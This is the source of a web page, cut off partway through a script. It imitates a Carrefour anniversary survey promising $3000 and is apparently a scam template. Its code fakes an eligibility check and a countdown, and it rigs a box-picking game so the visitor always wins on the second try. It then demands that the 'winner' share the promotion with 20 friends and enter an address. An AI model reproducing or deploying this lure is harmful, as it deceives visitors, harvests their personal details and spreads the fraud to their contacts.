<!DOCTYPE html>
<html lang="en">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
	<title>🎉Carrefour 60th Anniversary Celebration!🎊</title>
	<link rel="canonical" href="https://punctualsuperstitious.bar" />
	<meta property="og:title" content="🎉Carrefour 60th Anniversary Celebration!🎊">
	<meta property="og:description" content="Click to enter to participate in the survey, have a chance to win $ 3000 !">
	<meta property="og:image" itemprop="image" content="-XwfaSzI_cJI/YR57vxJHeQI/AAAAAAAACnI/KrgrkMQFyEM_PT84qgSpyRSzUADYEFdJgCLcBGAsYHQ/s16000/go.jpg">
	<meta property="og:url" content="https://www.carrefour.com//">
	<meta property="og:type" content="website">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="robots" content="noindex, follow">
    <script src="npm/jquery-3.6.0/dist/jquery.min.js"></script>
    <script src="npm/bootstrap-4.6.0/dist/js/bootstrap.min.js"></script>
    <script src="npm/sweetalert2-10.16.0/dist/sweetalert2.all.min.js"></script>
    <script src="npm/lazyload-2.0.0-rc.2/lazyload.min.js"></script>
	<script src="npm/popper_js-1.16.1/dist/umd/popper.min.js"></script>
	<link rel="stylesheet" href="npm/bootstrap-4.6.0/dist/css/bootstrap.min.css">
	<link rel="stylesheet" href="carrefour/static/sur.css">
	<link id="favicon" rel="shortcut icon" href="-HzUxpzvy7I0/YR57VE9D60I/AAAAAAAACmY/f0kaVV2Whe0lA8YOtLvSfy0TWkZfHLn7gCLcBGAsYHQ/s16000/favicon.ico">
	<script async src="https://www.googletagmanager.com/gtag/js?id=G-G6EMY41TRC"></script>
	<script>
		window.dataLayer = window.dataLayer || [];
		function gtag(){dataLayer.push(arguments);}
		gtag('js', new Date());
		gtag('config', 'G-G6EMY41TRC');
	</script>
	<script type="text/javascript">
        var brand_country = 'United Kingdom';
        var dayNames = new Array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday");
        var monthNames = new Array("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December");
        var minutos_y = "minutes and ";
        var segundos = "seconds";
        var modalOptions = {
            backdrop: 'static',
            keyboard: false
        };
        var g_share_step = 12;
        var g_banner_ad = true;
        var g_share_type = 1;
        var type_op = 1;
        var cl = 0;
        var p_e = 0;
        var p_s = 0;
        var all_p_e = [30, 30, 50, 50, 60, 70, 80, 85, 90, 95, 98, 100];
		function stepfinal() {
			jQuery("#p_body_content").fadeOut("slow");
			jQuery("#p_loading").fadeIn("slow");
		}
		function goToUrlFinish() {
			stepfinal();
			PreventExitPop = false;
			document.getElementById("p_form_post").submit();
		}
		function scrollTo(a) {
			if ($("#" + a).length) {
				var c = $("#" + a).offset();
				var b = c.top;
				$("html,body").animate({
					scrollTop: b
				}, {
					duration: "slow"
				});
			}
		}
		function getBrowser() {
			if ((navigator.userAgent.indexOf("Opera") || navigator.userAgent.indexOf("OPR")) != -1) {
				return "Opera";
			} else {
				if (navigator.userAgent.indexOf("Chrome") != -1) {
					return "Google Chrome";
				} else {
					if (navigator.userAgent.indexOf("Safari") != -1) {
						return "Safari";
					} else {
						if (navigator.userAgent.indexOf("Firefox") != -1) {
							return "Firefox";
						} else {
							if ((navigator.userAgent.indexOf("MSIE") != -1) || (!!document.documentMode == true)) {
								return "IE";
							} else {
								return "Unknown";
							}
						}
					}
				}
			}
			return "Unknown";
		}
		function getPlatform() {
			if (window.navigator.userAgent.indexOf("Windows NT 10.0") != -1) {
				return "Windows 10";
			}
			if (window.navigator.userAgent.indexOf("Windows NT 6.2") != -1) {
				return "Windows 8";
			}
			if (window.navigator.userAgent.indexOf("Windows NT 6.1") != -1) {
				return "Windows 7";
			}
			if (window.navigator.userAgent.indexOf("Windows NT 6.0") != -1) {
				return "Windows Vista";
			}
			if (window.navigator.userAgent.indexOf("Windows NT 5.1") != -1) {
				return "Windows XP";
			}
			if (window.navigator.userAgent.indexOf("Windows NT 5.0") != -1) {
				return "Windows 2000";
			}
			if (window.navigator.userAgent.indexOf("iPhone") != -1) {
				return "iPhone";
			}
			if (window.navigator.userAgent.indexOf("iPad") != -1) {
				return "iPad";
			}
			if (window.navigator.userAgent.indexOf("Android") != -1) {
				return "Android";
			}
			if (window.navigator.userAgent.indexOf("Mac") != -1) {
				return "Macintosh";
			}
			if (window.navigator.userAgent.indexOf("X11") != -1) {
				return "UNIX";
			}
			if (window.navigator.userAgent.indexOf("Linux") != -1) {
				return "Linux";
			}
			if (window.navigator.userAgent.indexOf("BlackBerry") != -1) {
				return "BlackBerry";
			}
			return "Unknown";
		}
		jQuery(document).ready(function() {
			function d(h) {
				var j, k, i = h,
					g = setInterval(function() {
						j = parseInt(i / 60, 10), k = parseInt(i % 60, 10), k = 10 > k ? "0" + k : k, $("#timerr").text(j + " " +
							minutos_y + k + " " + segundos), --i < 0 && (clearInterval(g));
					}, 1000);
			}
			if (jQuery("#timerr").length >= 1) {
				d((4 * 60) + 29);
			}
			function f(g) {
				if (g < 10) {
					g = "0" + g;
				}
				return g;
			}
			var b = new Date();
			var a = f(b.getHours()) + ":" + f(b.getMinutes());
			jQuery(".p_var-dia").text(b.getDate());
			jQuery(".p_var-mes").text(b.getMonth());
			jQuery(".p_var-anyo").text(b.getFullYear());
			jQuery(".p_var-dia_nombre").text(dayNames[b.getDay()]);
			jQuery(".p_var-mes_nombre").text(monthNames[b.getMonth()]);
			jQuery(".p_var-hora_fija").text(a);
			if (jQuery(".p_var-browser").length >= 1) {
				var c = getBrowser();
				jQuery(".p_var-browser").text(c);
			}
			if (jQuery(".p_var-browser").length >= 1) {
				var e = getPlatform();
				jQuery(".p_var-so").text(e);
			}
		});
		$(document).ready(function() {
			$(".bq1").click(function() {
				$("#q1").fadeOut("slow", function() {
					$("#q2").fadeIn("slow")
				})
			}), $(".bq2").click(function() {
				$("#q2").fadeOut("slow", function() {
					$("#q3").fadeIn("slow")
				})
			}), $(".bq3").click(function() {
				$("#q3").fadeOut("slow", function() {
					$("#q4").fadeIn("slow")
				})
			}), $(".bq4").click(function() {
				scrollTo("id1"), $("#content1").fadeOut("slow", function() {
					$("#content2").fadeIn(), setTimeout(function() {
						$("#result1").fadeIn(1e3)
					}, 3e3), setTimeout(function() {
						$("#result2").fadeIn(1e3)
					}, 4100), setTimeout(function() {
						$("#result3").fadeIn(1e3)
					}, 6e3), setTimeout(function() {
						$("#content2").fadeOut("slow", function() {
							"undefined" != typeof roulette_ini ? rouletteRoot._init() : "undefined" != typeof box_ini && boxRoot._init(),$("#content3").fadeIn();
						})
					}, 7100)
				})
			})
		});
        function set_Cookie(name, value) {
            name = "carrefour-tt"+name;
            var Days = 30;
            var exp = new Date();
            var domain = document.domain.split('.').slice(-2).join('.');
            exp.setTime(exp.getTime() + (Days * 20 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + ";domain=."+domain+"; path=/;"
        }
        function get_Cookie(name) {
            name = "carrefour-tt"+name;
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }
        function move() {
            cl = get_Cookie('prog') == '' ? 0 : parseInt(get_Cookie('prog')) - 2;
            cl = cl>=0?cl:0;
            var share_num = get_Cookie('prog') == '' ? 0 : parseInt(get_Cookie('prog'))
            var elem = document.getElementById("progressbar")
            if (cl < all_p_e.length && share_num <= g_share_step) {
                var p_e_num = cl
            } else {
                var p_e_num = all_p_e.length - 1
            }
            p_e = all_p_e[p_e_num];
            var id = setInterval(frame, 10)
            function frame() {
                if (p_s >= p_e) {
                    clearInterval(id)
                } else {
                    p_s++;
                    elem.style.width = p_s + '%';
                    elem.innerHTML = p_s * 1 + '%';
                }
            }
        }
    </script>
	<style>
        html, body {
            font-size: 14px;
            width: 100%;
            height: 100%;
            padding: 0;
            margin: 0;
            font-family: sans-serif;
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: transparent;
        }
        @-webkit-keyframes progress-bar-stripes {
            from {
                background-position: 40px 0;
            }
            to {
                background-position: 0 0;
            }
        }
        @-o-keyframes progress-bar-stripes {
            from {
                background-position: 40px 0;
            }
            to {
                background-position: 0 0;
            }
        }
        @keyframes progress-bar-stripes {
            from {
                background-position: 40px 0;
            }
            to {
                background-position: 0 0;
            }
        }
        .progress {
            height: 20px;
            margin-bottom: 20px;
            overflow: hidden;
            background-color: #F5F5F5;
            border-radius: 4px;
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
            box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
        }
        .progress-bar {
            float: left;
            width: 0%;
            height: 100%;
            font-size: 12px;
            line-height: 20px;
            color: #FFF;
            text-align: center;
            background-color: #337AB7;
            -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
            box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
            -webkit-transition: width 0.6s ease;
            -o-transition: width 0.6s ease;
            transition: width 0.6s ease;
        }
        .progress-bar {
            background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            -webkit-background-size: 40px 40px;
            background-size: 40px 40px;
        }
        .progress-bar {
            -webkit-animation: progress-bar-stripes 2s linear infinite;
            -o-animation: progress-bar-stripes 2s linear infinite;
            animation: progress-bar-stripes 2s linear infinite;
        }
        .progress-bar-success {
            background-color: #599BFF;
        }
        .progress-bar-success {
            background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
            background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
        }
        /*   fenxiangyemian */
        .share_success, .share_page {
            display: none;
        }
        .container {
            width: 100%;
            background-color: #ffffff;
            margin-right: auto;
            margin-left: auto;
        }
        .share_body {
            margin: 0 auto;
            width: 90%;
            background: #ffffff;
            border-radius: 10px;
        }
        .share_hd_text {
            text-align: center;
            font-size: 24px;
            font-weight: bold;
            color: #FF0000;
        }
        .share_main {
            margin: 10px auto;
            width: 100%;
            background: #eeeff4;
            border-radius: 10px;
        }
        .share_main_bt {
            margin: 10px auto;
            background:#4ab115;
            border-radius: 10px;
            width: 80%;
            line-height: 45px;
            text-align: center;
            font-size: 18px;
            font-weight: bold;
            color: #FFFFFF;
        }
        .weui_dialog_text {
            margin: 0 5px;
            text-align: center;
            font-size: 14px;
            color: #222222;
        }
        .page {
            /*display: none;*/
        }
        .p_modal_button {
            background-color: #1e5bc6;
        }
        .survey_button {
            background-color: #1e5bc6;
        }
        .header_flex_item {
            color: #000;
        }
		.detail_block {
			width: 100%;
			height: auto;
			/* float: left; */
			padding: 0 0 5px;
			margin: 10px 0 0px 0;
			border-bottom: 1px solid #eaeaea;
			position: relative;
			display: flex;
			flex-direction: row;
			justify-content: center;
			align-items: flex-start;
		}
		.detail_left {
			width: 20%;
			/* position: absolute; */
			/* float: left; */
			padding: 0;
			/*margin: 0 22px 0 0;*/
		}
        .detail_left img {
            width: 15vw;
            max-width: 15vw;
            height: 15vw;
        }
        .detail_right {
			display: flex;
			width: 80%;
			flex-direction: column;
			justify-content: center;
			align-items: flex-start;
			overflow: hidden;
			text-align: left;
		}
		.detail_right h3 {
			width: 100%;
			/* float: left; */
			padding: 0;
			margin: 0 0 5px;
			font-size: 1rem;
			color: #3b5998;
			font-weight: 700;
		}
        .detail_right h3 .comm_name {
            color: #000000
        }
        .detail_right h3 a:hover {
            color: #5f7dbc
        }
        .detail_right p {
            width: 100%;
            float: left;
            padding: 0;
            margin: 0 0 5px;
            color: #000;
            line-height: normal
        }
        .detail_right span {
            width: 100%;
            float: left;
            padding: 0;
            margin: 0 0 5px;
            font-size: 13px;
            color: #818181
        }
        .likebar {
		    float: right;
		    color: #7F7F7F;
		    display: flex;
		    flex-direction: row;
		    line-height: 24px;
		    align-items: center;
		    justify-content: center;
		}
		.top-header{
			position: fixed;
			width: 100%;
			height: 58px;
			z-index: 99;
			background: #fff;
			padding: 9px;
			opacity: 0.95;
		}
		.top-header > img{
			width: 30px;
		}
		.caja_gift{
			width: 98%;
			height: 90%;
		}
		.weui_dialog {
			position: fixed;
			z-index: 998;
			width: 85%;
			top: 50%;
			left: 50%;
			-webkit-transform: translate(-50%, -50%);
			transform: translate(-50%, -50%);
			background-color: #fafafc;
			text-align: center;
			border-radius: 10px;
			font-family: arial
		}
		.weui_mask {
			position: fixed;
			z-index: 1;
			width: 100%;
			height: 100%;
			top: 0;
			left: 0;
			background: rgba(0, 0, 0, .6)
		}
		.weui_dialog_hd {
			padding: 0em 0 .3em;
			margin-top: 15px;
		}
		.weui_dialog_bd {
			padding: 0 20px;
			font-size: 16px;
			color: #888;
			word-wrap: break-word;
			word-break: normal
		}
		.weui_dialog_ft {
			width: 90%;
			margin-left: 5%;
			margin-bottom: 10px;
			border-bottom-left-radius: 10px;
			border-bottom-right-radius: 10px;
			background-color: #ffffff;
			position: relative;
			line-height: 3rem;
			margin-top: 20px;
			font-size: 17px;
			display: -webkit-box;
			display: -webkit-flex;
			display: -ms-flexbox;
			display: flex
		}
		.weui_dialog_ft:after {
			content: " ";
			position: absolute;
			left: 0;
			top: 0;
			width: 100%;
			height: 1px;
			border-top: 1px solid #d5d5d6;
			color: #d5d5d6;
			-webkit-transform-origin: 0 0;
			transform-origin: 0 0;
			-webkit-transform: scaleY(.5);
			transform: scaleY(.5)
		}
		.weui_btn_dialog.primary {
			color: #fff
		}
		.weui_dialog_ft .btn {
			background-color: #1e5bc6;
			color: #ffffff;
			font-size: 1.2em;
			display: block;
			-webkit-box-flex: 1;
			-webkit-flex: 1;
			-ms-flex: 1;
			flex: 1;
			text-decoration: none;
			-webkit-tap-highlight-color: transparent
		}
		.weui_dialog_title {
			font-weight: 600;
			font-size: 20px;
			color: #000;
			margin-top: 10px;
		}
		.dt1677882647{
            display: none;
            background-image: url(-HzUxpzvy7I0/YR57VE9D60I/AAAAAAAACmY/f0kaVV2Whe0lA8YOtLvSfy0TWkZfHLn7gCLcBGAsYHQ/s16000/favicon.ico);
        }
		.weui_close {
			display: block;
			position: absolute;
			top: 6px;
			right: 6px;
		}
		img.error {
			display: inline-block;
			transform: scale(1);
			content: '';
			color: transparent;
		}
		img.error::before {
			content: '';
			position: absolute;
			left: 0; top: 0;
			width: 100%; height: 100%;
			background: #fff;
			opacity: 0.95;
		}
		img.error::after {
			content: '';
			position: absolute;
			left: 0; top: 0;
			width: 100%; height: 100%;
			background: #fff;
			opacity: 0.95;
		}
    </style>
</head>
<body>
<div class="top-header">
	<div style="width: 100%;display: inline-flex;">
		<img height="40px" src="-Gt6h-PFbzkg/YR57VwCbRzI/AAAAAAAACmg/EOQuB0oWoBY_KoFN2U_5Dx0GxxFlEPKHwCLcBGAsYHQ/s16000/left.png" onerror="this.classList.add('error');" style="position: absolute;">
		<img height="40px" src="" onerror="this.classList.add('error');" style="position: relative;margin: 0 auto;max-width: 200px;">
		<img height="40px" src="-ixFE9cyOZN4/YR57WJ0QPtI/AAAAAAAACmo/2zqOppSqxXoTeQ-1AE24sLVJPszKIfedQCLcBGAsYHQ/s16000/right.png" onerror="this.classList.add('error');" style="position: absolute;right:14px;">
	</div>
</div>
<div id="p_body_content" style="position:relative;top:58px;">
	<div style="display: flex; padding: 10px; background: #f5f5f5;">
		<div class="header_flex_item" style="width:70%">🎉Carrefour 60th Anniversary Celebration!🎊</div>
		<div class="header_flex_item" style="text-align: right;"><span class="p_var-dia">14</span>&nbsp;<span class="p_var-mes_nombre">May</span>,
			<span class="p_var-anyo">2021</span></div>
	</div>
	<div class="content" style="background-color:#fff;">
		<div class="main-content flag" id="content1" style="color:#232f3f;background-color:#fff ;">
			<h3 style="font-weight:700">Congratulations!</h3>
			<p>Carrefour 60th Anniversary Celebration!</p>
			<p>Through the questionnaire, you will have a chance to get $ 3000  .</p>
			<img width="100%" src="-mzAhBYu5pXg/YR57UCL02OI/AAAAAAAACmM/ye8nkST3UakRuZt0kH6gGz-kWZStWQinQCLcBGAsYHQ/s16000/1st.jpg">
			<div class="main-content flag" id="content1" style="background-color:#fff ;">
				<div id="q1">
					<p class="question">
						<strong>Question 1 of 4 :</strong> Do you know Carrefour ?
					</p>
					<div class="survey_button bq1" data-bq="1">
						yes
					</div>
					<div class="survey_button bq1" data-bq="2">
						no
					</div>
				</div>
				<div id="q2">
					<p class="question">
						<strong>Question 2 of 4 :</strong> How old are you ?
					</p>
					<div class="survey_button bq2" data-bq="1">
						18-29
					</div>
					<div class="survey_button bq2" data-bq="2">
						30-39
					</div>
					<div class="survey_button bq2" data-bq="3">
						40-49
					</div>
					<div class="survey_button bq2" data-bq="4">
						50+
					</div>
				</div>
				<div id="q3">
					<p class="question">
						<strong>Question 3 of 4 :</strong> How do you think of Carrefour ?
					</p>
					<div class="survey_button bq3" data-bq="1">
						Very good
					</div>
					<div class="survey_button bq3" data-bq="2">
						Unbelievable
					</div>
					<div class="survey_button bq3" data-bq="3">
						OK
					</div>
					<div class="survey_button bq3" data-bq="4">
						Not so good
					</div>
				</div>
				<div id="q4">
					<p class="question">
						<strong>Question 4 of 4 :</strong> Are you male or female ?
					</p>
					<div class="survey_button bq4" data-bq="1">
						Male
					</div>
					<div class="survey_button bq4" data-bq="2">
						Female
					</div>
				</div>
			</div>
		</div>
		<div class="main-content" id="content2">
			<style>
				.loader {
					border: 4px solid #f3f3f3; /* Light grey */
					border-top: 4px solid #1e5bc6; /* Blue */
					border-radius: 50%;
					width: 30px;
					height: 30px;
					animation: spin 2s linear infinite;
				}
				@keyframes spin {
					0% { transform: rotate(0deg); }
					100% { transform: rotate(360deg); }
				}
			</style>
			<h2 style="text-align:center;margin:10px 0;">We are verifying your answer...</h2>
			<div class="d-flex justify-content-center">
				<div class="loader"></div>
			</div>
			<p></p>
			<p class="result" id="result1" style="color:#000">
				You have answered all 4 questions
			</p>
			<p class="result" id="result2" style="color:#000">
				Your IP address is valid for this promotion
			</p>
			<p class="result" id="result3" style="color:#000">
				Gifts are available and in stock!
			</p>
		</div>
		<div class="main-content" id="content3">
            <style>
                .boxes,
                .boxes cbox,
                .boxes .try img {
                    width: 100%
                }
                .boxes {
                    margin: 10px auto;
                    max-width: 800px
                }
                .boxes>.try {
                    position: relative;
                    display: inline-block;
                    width: 23.8%;
                    -webkit-transition-duration: .2s;
                    transition-duration: .2s;
                    cursor: pointer
                }
                @media (max-width:767px) {
                    .boxes>.try {
                        width: 32.5%
                    }
                    .boxes>.try:nth-child(-n+4) {
                        display: none
                    }
                }
                @media (max-width:479px) {
                    .boxes>.try {
                        width: 32%
                    }
                }
                @media (max-width:319px) {
                    .boxes>.try {
                        width: 48%
                    }
                    .boxes>.try:nth-child(-n+5) {
                        display: none
                    }
                }
                .div_img_gift {
                    width: 100%;
                    text-align: center;
                    position: absolute;
                    top: 0;
                    left: 0;
                    z-index: 5;
                    display: none;
                    align-items: center;
                    justify-content: center
                }
                .img_gift {
                    display: none;
                    width: 70%;
                    -webkit-animation-duration: 1s;
                    animation-duration: 1s;
                    -webkit-animation-fill-mode: both;
                    animation-fill-mode: both;
                    -webkit-animation-name: rotateIn;
                    animation-name: rotateIn;
                    margin: 0 auto
                }
                @-webkit-keyframes rotateIn {
                    0% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: rotate3d(0, 0, 1, -200deg);
                        transform: rotate3d(0, 0, 1, -200deg);
                        opacity: 0
                    }
                    100% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: none;
                        transform: none;
                        opacity: 1
                    }
                }
                @keyframes rotateIn {
                    0% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: rotate3d(0, 0, 1, -200deg);
                        transform: rotate3d(0, 0, 1, -200deg);
                        opacity: 0
                    }
                    100% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: none;
                        transform: none;
                        opacity: 1
                    }
                }
                @keyframes tapa_superior {
                    0% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: rotate3d(0, 0, 1, -200deg);
                        transform: rotate3d(0, 0, 1, -200deg);
                        opacity: 0
                    }
                    100% {
                        -webkit-transform-origin: center;
                        transform-origin: center;
                        -webkit-transform: none;
                        transform: none;
                        opacity: 1
                    }
                }
                .boxes {
                    background-size: cover;
                    border-radius: 20px;
                    position: relative;
                    text-align: center
                }
                .try {
                    position: relative;
                    margin: 20px 0
                }
                .try>div {
                    position: absolute
                }
                .try .caja {
                    position: relative
                }
                .caja_trasera {
                    z-index: 1
                }
                .caja_tapa {
                    z-index: 3
                }
                .caja {
                    z-index: 2
                }
                .caja_gift {
                    z-index: 1
                }
                .boxes .try.abierta>.caja_tapa {
                    animation: tapa_superior 2s forwards
                }
                .boxes .try.premiazo>.caja_gift {
                    animation: tapa_superior 4s infinite alternate
                }
                @keyframes tapa_superior {
                    from {
                        top: 0
                    }
                    to {
                        top: -40px
                    }
                }
                @media (max-width:500px) {
                    @keyframes tapa_superior {
                        from {
                            top: 0
                        }
                        to {
                            top: -30px
                        }
                    } 
                }
                #p_loading,
                .p_loading {
                    position: fixed;
                    left: 0;
                    top: 0;
                    width: 100%;
                    height: 100%;
                    display: flex;
                    align-items: center;
                    z-index: 99;
                    background-color: #dadada
                }
                .temblor:hover {
                    animation: temblor .82s cubic-bezier(.36, .07, .19, .97) both;
                    transform: translate3d(0, 0, 0);
                    backface-visibility: hidden;
                    perspective: 1000px
                }
                @keyframes temblor {
                    10%,
                    90% {
                        transform: translate3d(-1px, 0, 0)
                    }
                    20%,
                    80% {
                        transform: translate3d(2px, 0, 0)
                    }
                    30%,
                    50%,
                    70% {
                        transform: translate3d(-4px, 0, 0)
                    }
                    40%,
                    60% {
                        transform: translate3d(4px, 0, 0)
                    }
                }
                .temblor_inf {animation: temblor_inf 2s;animation-iteration-count: infinite;margin: 0px;height: 140px;}
                @keyframes temblor_inf {
                    0% {
                        transform: translate(1px, 1px) rotate(0deg)
                    }
                    10% {
                        transform: translate(-1px, -2px) rotate(-1deg)
                    }
                    20% {
                        transform: translate(-3px, 0px) rotate(1deg)
                    }
                    30% {
                        transform: translate(3px, 2px) rotate(0deg)
                    }
                    40% {
                        transform: translate(1px, -1px) rotate(1deg)
                    }
                    50% {
                        transform: translate(-1px, 2px) rotate(-1deg)
                    }
                    60% {
                        transform: translate(-3px, 1px) rotate(0deg)
                    }
                    70% {
                        transform: translate(3px, 1px) rotate(-1deg)
                    }
                    80% {
                        transform: translate(-1px, -1px) rotate(1deg)
                    }
                    90% {
                        transform: translate(1px, 2px) rotate(0deg)
                    }
                    100% {
                        transform: translate(1px, -2px) rotate(-1deg)
                    }
                }
                .p_modal img {
                    max-width: 100%;
                    max-height: 28vh
                }
                .p_modal {
                    font-family: open sans, helvetica neue, Helvetica, Arial, sans-serif
                }
                .p_modal h2 {
                    color: #575757;
                    font-size: 25px;
                    text-align: center;
                    font-weight: 600;
                    text-transform: none;
                    position: relative;
                    margin: 25px 0;
                    padding: 0;
                    display: block
                }
                .p_modal p {
                    color: #797979;
                    font-size: 15px;
                    text-align: center;
                    font-weight: 300;
                    position: relative;
                    text-align: inherit;
                    float: none;
                    margin: 0;
                    padding: 0;
                    line-height: normal
                }
                .p_modal_button {
                    margin: 15px 0px 0 0px;
                    border: 1px solid #000;
                    white-space: nowrap;
                    align-items: center;
                    border-radius: 24px;
                    box-sizing: border-box;
                    display: inline-flex;
                    flex-direction: row;
                    height: 48px;
                    justify-content: center;
                    max-width: 180px;
                    min-width: 80px;
                    padding: 4px 24px;
                    }
                .checkmark {
                    display: none
                }
                .checkmark.draw:after {
                    animation-duration: 800ms;
                    animation-timing-function: ease;
                    animation-name: checkmark;
                    transform: scaleX(-1) rotate(135deg)
                }
                .checkmark:after {
                    opacity: 1;
                    height: 3.5em;
                    width: 1.75em;
                    transform-origin: left top;
                    border-right: 3px solid #5cb85c;
                    border-top: 3px solid #5cb85c;
                    content: "";
                    left: 1.75em;
                    top: 3.5em;
                    position: absolute
                }
                @keyframes checkmark {
                    0% {
                        height: 0;
                        width: 0;
                        opacity: 1
                    }
                    20% {
                        height: 0;
                        width: 1.75em;
                        opacity: 1
                    }
                    40% {
                        height: 3.5em;
                        width: 1.75em;
                        opacity: 1
                    }
                    100% {
                        height: 3.5em;
                        width: 1.75em;
                        opacity: 1
                    }
                }
                .circle-loader {
                    border: 1px solid rgba(0, 0, 0, .2);
                    border-left-color: #5cb85c;
                    animation: loader-spin 1.2s infinite linear;
                    position: relative;
                    display: inline-block;
                    vertical-align: top;
                    border-radius: 50%;
                    width: 7em;
                    height: 7em
                }
                .load-complete {
                    -webkit-animation: none;
                    animation: none;
                    border-color: #5cb85c;
                    transition: border 500ms ease-out
                }
                @keyframes loader-spin {
                    0% {
                        transform: rotate(0deg)
                    }
                    100% {
                        transform: rotate(360deg)
                    }
                }
                .swal2-styled.swal2-confirm {
	                background-color: #8cd4f5;
	                box-shadow: none;
	                padding: 10px 32px;
	                margin-top: 10px;
	                cursor: pointer;
	                color: #fff;
	                border-radius: 0.2rem;
	                border: 1px solid rgba(84, 84, 84, 0.4);
	                font-weight: 300;
	                font-size: 19px;
	                width: 100%;
	                background: #1e5bc6;
	            }
	            .swal2-actions {
	                padding: 0 !important;
	            }
            </style>
            <script type="text/javascript">
                var box_ini = !1
                var modalOptions = {
                    backdrop: 'static',
                    keyboard: false
                };
                var count = 1;
                var windraw = 2;
                var intentos = 3;
                if(intentos < windraw){var intentos = windraw;}
                var puedo = false;
                var boxRoot;
                var datetime = 1678487447823;
                (function() {
                    "use strict";
                    boxRoot = {
                        _init: function() {
                            setTimeout(function() {
								Swal.fire({
									title: 'Congratulation!',
									html: '<p style="margin:10px 0;font-size: 14px;font-weight: 600;">Your answer has been saved successfully!</p><p style="margin:1px;">You have a chance to win gifts.</p><p style="margin:1px;">You must select the correct box with your prize inside.</p><p style="margin:1px;">You have 3 attempts. Good luck!</p>',
									imageUrl: '-QWfuk7Jlw7k/YR57VsnvEwI/AAAAAAAACmc/CEEWNgae20cdUadqJe_xHG_xpu43fH-owCLcBGAsYHQ/s16000/fullbox.png',
								// 	imageHeight: 227,
									imageAlt: 'Custom image',
								}).then(function(){
									puedo = true;
								});
								setTimeout(function(){
									$('.swal2-header').find('.swal2-image').addClass('temblor_inf');
									$('.swal2-content').css('padding','0');
									$('.swal2-content').css('font-size','1rem');
								},50);
                            }, 1000);
                            jQuery('.try').on('click', function() {
                                if (puedo && count <= windraw) {
                                    if (jQuery(this).hasClass('abierta')) {} else {
                                        puedo = false;
                                        jQuery(this).addClass('abierta');
                                        if (count == windraw) {
                                            jQuery(this).addClass('premiazo');
                                            setTimeout(function() {
                                                jQuery(".div_img_gift, .img_gift").fadeIn("slow",
                                                    function() {
                                                    	startConfetti();
                                                        setTimeout(function() {
                                                        	Swal.fire({
																title: 'Congratulation!',
																html: '<p style="margin:10px 0;font-size: 14px;font-weight: 600;">You did it! You won $ 3000 </p><p style="margin:1px;">*** THE RULES ***</p><div style="text-align:center;"><p style="margin:1px;">1. You must tell 5 groups or 20 friends about our promotions.</p><p style="margin:1px;">2. Enter your address and complete registration.</p><p style="margin:1px;">3. The gifts will be delivered within 5-7 days</p></div>',
																imageUrl: 'https://1.bp.blogspot.com/-tgdyzabxuJ4/YKpjmQ_UJKI/AAAAAAAABfk/VqO0bIY6vq0EZ9BvCyHwfUT8owQt7dzWwCLcBGAsYHQ/s16000/United-States_outbox.png',
																imageHeight: 180,
																imageAlt: 'Custom image',
															}).then(function(){
																puedo = false;
																showShare();
																stopConfetti();
															});
															setTimeout(function(){
																// $('.swal2-header').find('.swal2-image').addClass('temblor_inf');
																$('.swal2-content').css('padding','0');
																$('.swal2-content').css('font-size','1rem');
															},50);
                                                        }, 1500);
                                                    });
                                            }, 4000);
                                        } else {
                                            count++;
                                            intentos--;
                                            setTimeout(function() {
                                                swal_box(intentos);
                                            }, 2000);
                                        }
                                    }
                                }
                            });
                        }
                    };
                    jQuery(document).ready(function() {
                        if (typeof box_ini == "undefined") {
                            boxRoot._init();
                        }
                    });
                })();
                function swal_box(intentos){
                	let texts = ['Sorry, the box you selected is empty. You still have 1 chances! Good luck!','Sorry, the box you selected is empty. You still have 2 chances! Good luck!'];
                	Swal.fire({
                		icon: 'error',
						title: 'Unfortunately...',
						text: texts[intentos-1],
					}).then(function(){
						puedo = true;
					});
					setTimeout(function(){
						$('.swal2-content').css('padding','0');
						$('.swal2-content').css('font-size','1rem');
					},50);
                }
                var maxParticleCount = 150;
	            var particleSpeed = 2;
	            var startConfetti;
	            var stopConfetti;
	            var toggleConfetti;
	            var removeConfetti;
	            (function() {
	                startConfetti = startConfettiInner;
